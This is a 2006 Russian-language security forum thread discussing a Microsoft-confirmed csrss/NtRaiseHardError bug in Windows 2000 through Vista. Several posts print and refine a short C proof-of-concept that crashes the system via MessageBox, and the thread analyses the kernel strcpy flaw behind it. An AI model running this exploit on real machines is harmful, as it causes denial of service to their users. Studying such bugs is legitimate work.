ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Мировые новости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

MS подтвердила существование уязвимости в подcистеме csrss
  #1  
Старый 25.12.2006, 03:14
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


Exclamation MS подтвердила существование уязвимости в подcистеме csrss

В блоге Microsoft Security Response Center
появилось подтверждение существования ошибки в Client Server Run-Time Subsystem, которая может привести к повышению локальных привилегий. Код, запарывающий память csrss, что в большинстве случаев выкидывает систему (от win2k до висты) на синий экран, использует штатную функцию WinAPI MessageBox. Пока в Microsoft сохраняют спокойствие, продолжая считать Висту самой безопасной современной платформой и отслеживая ситуацию, связанную с этой уязвимостью.
Источник: www.mazafaka.ru
 
Ответить с цитированием

  #2  
Старый 25.12.2006, 08:13
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610

Репутация: 4360


Отправить сообщение для _Great_ с помощью ICQ
По умолчанию

Цитата:
Код, запарывающий память csrss, что в большинстве случаев выкидывает систему (от win2k до висты) на синий экран, использует штатную функцию WinAPI MessageBox.
да епт при чем тут месажбокс. система вылетает на уровне ядра в функции NtRaiseHardError, которая неккоректно обрабатывает строку, начинающуюся на \??\.

Цитата:
продолжая считать Висту самой безопасной современной платформой
гыгы, ну-ну...
 
Ответить с цитированием

  #3  
Старый 25.12.2006, 11:56
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


Exclamation

А вот и сам сплоит:
Цитата:
#include <stdio.h>
#include <windows.h>

int main(void){
int i;
char bug1 [] ="\\??\\XXXX";
for(i = 0; i < 10; i ++)
{
MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
}
}
Кто затестил?
Взят отсюда http://www.security.nnov.ru
Ссылка по теме: http://www.kuban.ru/forum_new/forum2/files/19124.html

Последний раз редактировалось -=lebed=-; 25.12.2006 в 12:01..
 
Ответить с цитированием

  #4  
Старый 25.12.2006, 12:35
Talisman
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772

Репутация: 517


Отправить сообщение для Talisman с помощью ICQ
По умолчанию

хы... как юнит скомпилил в бдске - нифига винда не вылетает)
приду вечером, надеюсь добью багсу...
 
Ответить с цитированием

  #5  
Старый 25.12.2006, 14:14
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610

Репутация: 4360


Отправить сообщение для _Great_ с помощью ICQ
По умолчанию

я тестил, работает. сплоит можно сократить до

Код:
#include <windows.h>

int main(void){
int i;
char bug [] ="\\??\\";
for(i = 0; i < 10; i ++) MessageBox(0, bug, bug, MB_SERVICE_NOTIFICATION);
}
Работает на ура.
MessageBox при флаге MB_SERVICE_NOTIFICATION вызывает на самом деле ntdll!NtRaiseHardError для показа окошка, а она - переходник для функции ядра ntoskrnl!NtRaiseHardError.
В ней идет обработка первых символов \??\ весьма причудливым образом.
Как написано в письме, отосланном в микрософт, ]it looks like some
"debug" feature not cleaned out in final release and it seems to
exploitable to code execution at kernel level.

Вот такие пироги. Если повезет, можно накатать сплоит для выполнения кода в режиме ядра, последствия чего пояснять не стоит.

Уязвимые версии - 2000 (все сп), XP ( все сп), Vista.
Однако микрософт продолжает считать Висту защищенной. Ну-ну

Вот такие пироги, в кратце)


UPD: Кусок кода NtRaiseHardError:
Код:
} else if ((asLocal.Length > 4) && !_strnicmp(asLocal.Buffer, "\\??\\", 4)) {
strcpy( asLocal.Buffer, asLocal.Buffer+4 );
по документации strcpy: The behavior of strcpy is undefined if the source and destination strings overlap.

Последний раз редактировалось _Great_; 25.12.2006 в 14:18..
 
Ответить с цитированием

  #6  
Старый 26.12.2006, 09:59
karabym
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
Провел на форуме:
678331

Репутация: 44
По умолчанию

Хехе Билли как всегда слепо верит что от его творения неcмогут отказаться
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Какие уязвимости есть в IPB v1.1.2? Inferno Форумы 2 26.06.2007 22:23
Уязвимости чатов L@nd@R Чаты 4 03.04.2005 05:12
Действующие уязвимости почтовых систем РФ Maxmen E-Mail 16 12.12.2004 16:48
Вопрос про уязвимости в FastBB deo Форумы 9 29.11.2004 09:47
Вопрос про уязвимости в exbb Форумы 1 02.08.2004 19:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ